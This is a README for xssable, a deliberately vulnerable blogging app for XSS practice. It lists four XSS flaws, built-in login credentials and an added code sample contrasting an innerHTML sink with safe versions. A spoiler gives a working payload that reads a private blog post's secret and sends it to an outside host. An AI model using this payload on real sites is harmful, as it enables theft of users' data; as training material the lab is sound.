xssable
A vulnerable blogging platform used to demonstrate XSS vulnerabilities.
xssable is a vulnerable blogging platform used to demonstrate XSS vulnerabilities.
Usage
To run it locally:

```shell
docker build . -t xssable:latest
docker run -p 5000:5000 xssable:latest
```

or

```shell
pip install -r requirements.txt
python app.py
```
Then access the application on http://127.0.0.1:5000.
Spoiler!
Credentials for the built-in user accounts are `John:12345` and `Connie:iloveyou1`.

Currently there are 4 different XSS vulnerabilities:
- a reflected XSS (with the possibility to bypass Chrome’s XSS Auditor),
- a stored XSS with limited exploitation,
- a stored XSS without limitations, and
- a `location.hash`-to-`innerHTML` based DOM XSS.
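The last item, the fragment-to-`innerHTML` flow, as an added example that is not the xssable project's own code: the vulnerable sink beside two hardened versions, using a minimal stand-in for a DOM element (an assumption) so it runs under Node without a browser.

```javascript
// Added example (not the xssable project's code): the DOM XSS pattern listed
// above, where location.hash flows into innerHTML, shown as the vulnerable
// sink beside two hardened versions. A minimal stand-in for a DOM element is
// used so the code runs under Node without a browser (an assumption).

// Stand-in for a DOM element: just records the last value written to each sink.
function makeElement() {
  return { innerHTML: '', textContent: '' };
}

// Turn "#..." into the string the page would use. A malformed percent-escape
// makes decodeURIComponent throw; fall back to the raw fragment instead of
// crashing the page.
function fragmentValue(hash) {
  const raw = hash.startsWith('#') ? hash.slice(1) : hash;
  try {
    return decodeURIComponent(raw);
  } catch (e) {
    return raw;
  }
}

// Vulnerable: the fragment is parsed as markup, so any tag in the URL becomes
// part of the DOM and any script it carries runs in the page's origin.
function renderVulnerable(el, hash) {
  el.innerHTML = fragmentValue(hash);
  return el.innerHTML;
}

// Hardened (preferred): textContent treats the value as text, never as markup.
function renderSafe(el, hash) {
  el.textContent = fragmentValue(hash);
  return el.textContent;
}

// Hardened (when the value must be spliced into an HTML string): escape the
// characters that can change the parse before writing to the markup sink.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

function renderEscaped(el, hash) {
  el.innerHTML = escapeHtml(fragmentValue(hash));
  return el.innerHTML;
}

// Detection: flag values reaching a markup sink that still contain an element
// tag; handy as a quick assertion in front-end tests.
function containsMarkup(value) {
  return /<\/?[a-z][^>]*>/i.test(value);
}
```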
Exploitation (beyond alert() pop-ups) can be practiced by getting access to Connie’s private blog post and stealing the secret code.
Spoiler!
```html
fetch('/blogs').then(r => r.text()).then(t => fetch('https://attacker.kiwi.com/?s='%2bt.split('%F0%9F%94%92')[1].split('<strong>')[1].split('<')[0]))</script>
```
The application highlights that:
- blacklists are bypassable,
- browser protections are unreliable,
- not every “XSS” has the same impact,
- frameworks do unexpected stuff, and
- server-side validation is important.
What’s next?
- https://xss-game.appspot.com/ - good for basics, created by Google.
- https://knock.xss.moe - focused on exploitation and filter evasion.
- https://polyglot.innerht.ml/ - an awesome polyglot challenge (it’s over by now and the results are public).